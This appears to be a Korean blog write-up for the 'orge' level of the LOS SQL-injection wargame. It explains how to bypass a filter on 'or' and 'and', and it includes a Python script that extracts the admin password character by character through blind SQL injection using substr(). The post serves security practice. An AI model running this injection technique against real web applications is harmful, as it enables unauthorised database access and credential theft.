본문 바로가기

Wargame, CTF/LOS_eagle

LOS _orge

전에 darkelf와 같이 or과 and를 필터링하고

이번에는 데이터베이스에 있는 admin의 pw와

입력한 pw가 있치해야한다

or과 and 필터링을 우회하고 Blind injection을 시도하면 될거같다

...더보기

pw의 길이는 8글자

import requests

url="https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php?pw="

cookie={"PHPSESSID":"qagfqnef3onon13vkcpmp4g8r3"}

session=requests.Session()

password=""

for i in range(1,9):
    for j in range(33, 127):
        payload=session.get(url+"' || id='admin' %26%26 substr(pw,"+str(i)+",1)='"+chr(j)+"'%23",cookies=cookie)
        if("Hello admin" in payload.text):
            print(chr(j)+"is correct!!!!!!!")
            password += chr(j)
            break
        print(chr(j)+"is incorrect")
print(password)

mySQL은 기본적으로는 대문자와 소문자를 똑같이 인식하기 때문에

대문자를 소문자로 변경시켜준다

'Wargame, CTF > LOS_eagle' 카테고리의 다른 글

LOS _vampire  (0) 2019.10.05
LOS _troll  (0) 2019.10.05
LOS _dark elf  (0) 2019.10.05
LOS _wolfman  (0) 2019.10.01
LOS _orc  (0) 2019.10.01